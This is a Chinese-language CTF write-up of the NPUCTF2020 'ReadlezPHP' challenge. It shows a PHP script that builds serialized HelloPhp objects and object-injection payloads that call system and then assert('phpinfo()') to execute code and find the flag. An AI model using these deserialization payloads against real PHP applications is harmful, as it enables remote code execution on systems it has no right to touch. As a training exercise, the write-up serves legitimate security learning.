当前位置:网站首页>[NPUCTF2020]ReadlezPHP 1

[NPUCTF2020]ReadlezPHP 1

2022-07-27 05:04:00 weixin_53150482


每周学习总结

  1. 打开网页:
    在这里插入图片描述
    没有任何可以利用的点,查看源代码:
    在这里插入图片描述
    在最下面发现这样一段话,点击发现源代码:
    在这里插入图片描述

  2. 很明显代码审计,因为代码很简单就不做过多的赘述,这直接的思路就是反序列化,这里的思路就是将 $b 赋值为 system 之类的,将 $a 赋值为执行的命令
    所以我们开始编写 payload, 我们可以想到的执行命令的就是 system 和 eval,所以这里我们先使用 system 进行目录遍历:

    <?php
    
    class HelloPhp
    {
          
        public $a="ls";
        public $b=system;
         
      
    }
     $c = new HelloPhp;
     $b = serialize($c);
    echo $b;
    
    
    ?>
    

    O:8:“HelloPhp”:2:{s:1:“a”;s:2:“ls”;s:1:“b”;s:6:“system”;}
    显示内容: 在这里插入图片描述
    这就不对了,可能是过滤了,所以我们换一个 eval 试一下 ,因为这个是执行 php 代码所以我们先试一下 phpinfo() :
    在这里插入图片描述
    连输出都没有了,肯定不行了,这下搞个什么,看看 别人的 wp

  3. 他们使用的 assert ,这个不是断言吗?但是它会通过执行第一个参数来判断后续步骤,也可以
    构造 payload:

    O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}
    在这里插入图片描述
    在当前页面寻找 flag 就可以找到

总结

  1. 这一关告诉我们在 PHP 中执行代码有 sysytem() eval() assert()
  2. 关于 assert() 的另一道题 :攻防世界-mfw
原网站

版权声明
本文为[weixin_53150482]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_53150482/article/details/125896448